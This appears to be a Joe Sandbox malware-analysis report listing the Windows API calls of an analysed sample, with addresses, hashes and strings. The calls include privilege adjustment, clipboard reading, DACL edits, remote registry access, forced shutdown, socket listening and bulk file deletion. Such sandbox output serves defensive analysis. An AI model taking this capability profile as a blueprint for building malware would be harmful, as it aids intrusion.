                                                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E8BAAE
                                                                                                                        • GetProcessWindowStation.USER32 ref: 00E8BAC7
                                                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00E8BAD1
                                                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E8BAEB
                                                                                                                          • Part of subcall function 00E8B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E8B9EC), ref: 00E8B8C5
                                                                                                                          • Part of subcall function 00E8B8B0: CloseHandle.KERNEL32(?,?,00E8B9EC), ref: 00E8B8D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                        • String ID: $default$winsta0
                                                                                                                        • API String ID: 2063423040-1027155976
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97B9F: __wsplitpath.LIBCMT ref: 00E97BBC
                                                                                                                          • Part of subcall function 00E97B9F: __wsplitpath.LIBCMT ref: 00E97BCF
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96B9D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96BBB
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96BE2
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E96BF8
                                                                                                                        • _wcscpy.LIBCMT ref: 00E96C57
                                                                                                                        • _wcscat.LIBCMT ref: 00E96C6A
                                                                                                                        • _wcscat.LIBCMT ref: 00E96C7D
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E96CAB
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96CBC
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96CDB
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E96CEA
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00E96CFF
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96D10
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E96D37
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96D53
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96D61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1867810238-1173974218
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(00EEDBF0), ref: 00EA70C3
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EA70D1
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00EA70D9
                                                                                                                        • CloseClipboard.USER32 ref: 00EA70E5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EA7101
                                                                                                                        • CloseClipboard.USER32 ref: 00EA710B
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EA7120
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EA712D
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00EA7135
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EA7142
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EA7176
                                                                                                                        • CloseClipboard.USER32 ref: 00EA7283
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3222323430-0
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9FE03
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E9FE57
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E9FE7C
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E9FE93
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E9FEBA
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF06
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF3F
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FF93
                                                                                                                          • Part of subcall function 00E7234B: __woutput_l.LIBCMT ref: 00E723A4
                                                                                                                        • __swprintf.LIBCMT ref: 00E9FFE1
                                                                                                                        • __swprintf.LIBCMT ref: 00EA0030
                                                                                                                        • __swprintf.LIBCMT ref: 00EA007F
                                                                                                                        • __swprintf.LIBCMT ref: 00EA00CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                        • API String ID: 108614129-2428617273
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA2065
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA207A
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2091
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EA20A3
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EA20BD
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EA20D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA20E0
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA20FC
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2123
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA213A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA214C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00F03A68), ref: 00EA216A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA2174
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2181
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2191
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00EA21C0
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA21D5
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA21EC
                                                                                                                          • Part of subcall function 00E97606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E97621
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EA221B
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA2226
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EA2242
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2269
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2280
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA2292
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00F03A68), ref: 00EA22B0
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EA22BA
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA22C7
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00EA22D7
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_memset
                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                          • Part of subcall function 00E8B8E7: GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
                                                                                                                          • Part of subcall function 00E8B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                          • Part of subcall function 00E8B8E7: HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                          • Part of subcall function 00E8B982: GetProcessHeap.KERNEL32(00000008,00E8B3E1,00000000,00000000,?,00E8B3E1,?), ref: 00E8B98E
                                                                                                                          • Part of subcall function 00E8B982: HeapAlloc.KERNEL32(00000000,?,00E8B3E1,?), ref: 00E8B995
                                                                                                                          • Part of subcall function 00E8B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E8B3E1,?), ref: 00E8B9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E8B3FC
                                                                                                                        • _memset.LIBCMT ref: 00E8B411
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8B430
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B441
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E8B47E
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E8B49A
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B4B7
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E8B4C6
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E8B4CD
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E8B4EE
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00E8B4F5
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8B526
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E8B54C
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8B560
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96E7E
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96E99
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E96EAE
                                                                                                                        • _wcscpy.LIBCMT ref: 00E96EDD
                                                                                                                        • _wcscat.LIBCMT ref: 00E96EEF
                                                                                                                        • _wcscat.LIBCMT ref: 00E96F01
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96F0E
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E96F22
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96F3D
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                        • API String ID: 0-2893523900
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB317F
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EB321E
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EB32B6
                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EB34F5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB3502
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1240663315-0
                                                                                                                        • Opcode ID: 48e9c209ad0905f38228b284138ff6c6029f85af22c3b52ce5e3bf44885f83cf
                                                                                                                        • Instruction ID: 8ee55ccaf7c9b21e90d253de440749d2b4041df3d3b16699c3fa109d02a61d81
                                                                                                                        • Opcode Fuzzy Hash: 48e9c209ad0905f38228b284138ff6c6029f85af22c3b52ce5e3bf44885f83cf
                                                                                                                        • Instruction Fuzzy Hash: 68E16B31204210AFCB14DF29CD95D6BBBE9EF89314F04996DF85AEB261DA30ED05CB51
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: ceaa6b5773302d7cc4b93e190fde395223018de20700e7b533d7ff339cb131b1
                                                                                                                        • Instruction ID: c087d7d0a089404bd667bdb3780973c0756c54b7e47a4308f70b34cd48b47cfd
                                                                                                                        • Opcode Fuzzy Hash: ceaa6b5773302d7cc4b93e190fde395223018de20700e7b533d7ff339cb131b1
                                                                                                                        • Instruction Fuzzy Hash: E921D131249210AFDB10AF65EC09B6E7BE8FF49310F01901AF94ABB261DB31ED059B90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8A857: CLSIDFromProgID.OLE32 ref: 00E8A874
                                                                                                                          • Part of subcall function 00E8A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00E8A88F
                                                                                                                          • Part of subcall function 00E8A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00E8A89D
                                                                                                                          • Part of subcall function 00E8A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E8A8AD
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EAC6AD
                                                                                                                        • _memset.LIBCMT ref: 00EAC6BA
                                                                                                                        • _memset.LIBCMT ref: 00EAC7D8
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00EAC804
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00EAC80F
                                                                                                                        Strings
                                                                                                                        • NULL Pointer assignment, xrefs: 00EAC85D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                        • Opcode ID: e73a0aad0cdcfdfde73524eb265897ee865897579e983457374d11ff55d37311
                                                                                                                        • Instruction ID: 7f5071588fbe018cc54eb3fc70b7c0625af8f1cddf6af95bf4e7f6e5ffe8d903
                                                                                                                        • Opcode Fuzzy Hash: e73a0aad0cdcfdfde73524eb265897ee865897579e983457374d11ff55d37311
                                                                                                                        • Instruction Fuzzy Hash: 13914A71D00218ABDB14DFA4DC81EDEBBB9EF09750F20515AF919BB281DB706A45CFA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EA24F6
                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EA2526
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA253A
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2555
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EA25F3
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EA2609
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                        • Opcode ID: 07b4fcf2953e587faf4ad1e23749ee7e9e3979f59a2048ab8c67de2b0d5236f0
                                                                                                                        • Instruction ID: 1fae12c8fdebb848fe1c0a2a6d2c27172a9cde143ef74c3f84ae91b87cec2f20
                                                                                                                        • Opcode Fuzzy Hash: 07b4fcf2953e587faf4ad1e23749ee7e9e3979f59a2048ab8c67de2b0d5236f0
                                                                                                                        • Instruction Fuzzy Hash: C141B171D0521AAFCF10DFA8CC59AEEBBB4FF09304F10545AE915BA191E730AA44CF51
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 3d8b1920664746076493ba45a3f524e54323432b854906ab94e3de99d1eff29a
                                                                                                                        • Instruction ID: 73fc609ddcda1aa7a928f84476b91556888685634a94ace74d94d7111eb04332
                                                                                                                        • Opcode Fuzzy Hash: 3d8b1920664746076493ba45a3f524e54323432b854906ab94e3de99d1eff29a
                                                                                                                        • Instruction Fuzzy Hash: 8F928B74A0021ACBDF24CF58C9807EDB7B1EB54359F2469AAEC16BB381D7309D86CB51
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 6d2a646fd6472daca48fac03e7ce0f2132fd3b45ecc3717b69c3404b75f7b702
                                                                                                                        • Instruction ID: 7aef24fd5afc6f117b49f667dfc7accf33cbad6875749a5098474222b6616ddf
                                                                                                                        • Opcode Fuzzy Hash: 6d2a646fd6472daca48fac03e7ce0f2132fd3b45ecc3717b69c3404b75f7b702
                                                                                                                        • Instruction Fuzzy Hash: F2126B70A00609DFDF04DFA5DA81AAEB7F5FF48301F206969E846F7250EB36A915CB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                          • Part of subcall function 00E8BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                          • Part of subcall function 00E8BEC3: GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00E9830C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                        • Opcode ID: c34ea2451b23bf09fbc1a39500c9792c5eddbac82d2f953414669466bb410e80
                                                                                                                        • Instruction ID: 0e2c2edc68e82ec2e49c8afe5b874c7b08a0d200e1d785707ef21f1e1c280157
                                                                                                                        • Opcode Fuzzy Hash: c34ea2451b23bf09fbc1a39500c9792c5eddbac82d2f953414669466bb410e80
                                                                                                                        • Instruction Fuzzy Hash: 5A01A771694315ABEF68A6789D4AFFB7358DB12F84F142425FD43F51F1DE609C0081A4
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EA9235
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9244
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00EA9260
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00EA926F
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9289
                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00EA929D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279440585-0
                                                                                                                        • Opcode ID: c9cf243418a9ae6aede0861fb789a486106a1eea9757d0419bccdd3fc9a026a6
                                                                                                                        • Instruction ID: 2092af59fbb747a09ff942333ab9d4841d30613e6f2841ccd21209030e9a7f47
                                                                                                                        • Opcode Fuzzy Hash: c9cf243418a9ae6aede0861fb789a486106a1eea9757d0419bccdd3fc9a026a6
                                                                                                                        • Instruction Fuzzy Hash: AA21A235600600AFCB10EF64EC45B6E77F9EF49324F14915AF956BB2A2CB30AD45CB61
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E96F7D
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E96F8D
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E96FAC
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96FD0
                                                                                                                        • _wcscat.LIBCMT ref: 00E96FE3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E97022
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605983538-0
                                                                                                                        • Opcode ID: d3f9adbbea77bdc8ae277d61a278f5a53d4b1ec9d47b9f3bfe6910dbade0e915
                                                                                                                        • Instruction ID: 27a7195c82ea4973592dc72c45063d17c147302eb83f547ad896d767e1ee33d3
                                                                                                                        • Opcode Fuzzy Hash: d3f9adbbea77bdc8ae277d61a278f5a53d4b1ec9d47b9f3bfe6910dbade0e915
                                                                                                                        • Instruction Fuzzy Hash: 2C214F71905219ABDF10ABA4DC88BEEB7BCEB49304F1014AAE645F3141E7759B88DB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _memmove.LIBCMT ref: 00EC3020
                                                                                                                        • _memmove.LIBCMT ref: 00EC3135
                                                                                                                        • _memmove.LIBCMT ref: 00EC31DC
